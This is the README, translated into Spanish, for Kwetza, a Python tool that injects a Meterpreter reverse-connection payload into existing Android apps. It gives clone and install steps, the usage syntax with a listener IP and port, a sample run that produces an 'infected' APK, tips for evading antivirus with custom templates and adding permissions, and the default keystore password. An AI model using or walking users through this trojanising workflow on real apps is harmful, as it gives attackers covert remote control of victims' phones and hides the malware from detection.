
Script de Python para inyectar una carga útil de Meterpreter en aplicaciones Android existentes.
Por Chris Le Roy (@brompwnie) [email protected]
Kwetza es una herramienta que permite infectar una aplicación Android existente con un payload de Meterpreter.
Kwetza infecta una aplicación Android existente con plantillas de payload personalizadas o predeterminadas para evitar la detección por antivirus. Kwetza permite infectar aplicaciones Android utilizando los permisos predeterminados de la aplicación objetivo o inyectar permisos adicionales para obtener funcionalidades adicionales.
Los pasos manuales automatizados por Kwetza se pueden encontrar aquí: https://sensepost.com/blog/2016/kwetza-infecting-android-applications/
Primero obtén el código:
git clone https://github.com/sensepost/kwetza.git
Kwetza está escrito en Python y requiere BeautifulSoup que se puede instalar usando Pip:
pip install beautifulsoup4
Kwetza requiere que Apktool esté instalado y accesible a través de tu PATH. Esto se puede configurar usando las instrucciones de instalación ubicadas aquí: https://ibotpeaches.github.io/Apktool/install
python kwetza.py nameOfTheApkToInfect.apk https/tcp LHOST LPORT yes/no customClass
python kwetza.py hackme.apk https 10.42.0.118 4444 yes com.moo.another.activity
[+] MMMMMM KWETZA
[*] DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.42.0.118
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING COMMS...
[*] ANALYZING ANDROID MANIFEST...
[+] TARGET ACTIVITY: com.foo.moo.gui.MainActivity
[*] INJECTION INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED
[*] INJECTION OF CRAZY PERMS TO BE DONE!
[+] TIME TO BUILD INFECTED APK
[*] EXECUTING APKTOOL BUILD COMMAND
[+] BUILD RESULT
############################################
I: Using APktool 2.2.0
I: Checking whether source shas changed...
I: Smaling smali folder into classes.dex
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs ...(/lib)
I: Building apk file...
I: Copying unknown files/dir...
###########################################
[*] EXECUTING JARSIGNER COMMAND...
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
###########################################
jar signed.
###########################################
[+] L00t located at hackme/dist/hackme.apk
Kwetza ha sido desarrollado para funcionar con Python 2.
Kwetza por defecto usará la plantilla y el almacén de claves ubicados en la carpeta "payload" para inyectar y firmar el apk infectado.
Si deseas firmar la aplicación infectada con tu propio certificado, genera un nuevo almacén de claves y colócalo en la carpeta "payload" y renómbralo con el nombre del almacén existente o cambia la referencia en kwetza.py.
Lo mismo se puede hacer para las plantillas de payload.
La contraseña para el almacén de claves predeterminado es, bueno, "password".
Kwetza está licenciado bajo una Licencia Creative Commons Atribución-NoComercial-CompartirIgual 4.0 Internacional (http://creativecommons.org/licenses/by-nc-sa/4.0).
Los permisos más allá del alcance de esta licencia pueden estar disponibles en http://sensepost.com/contact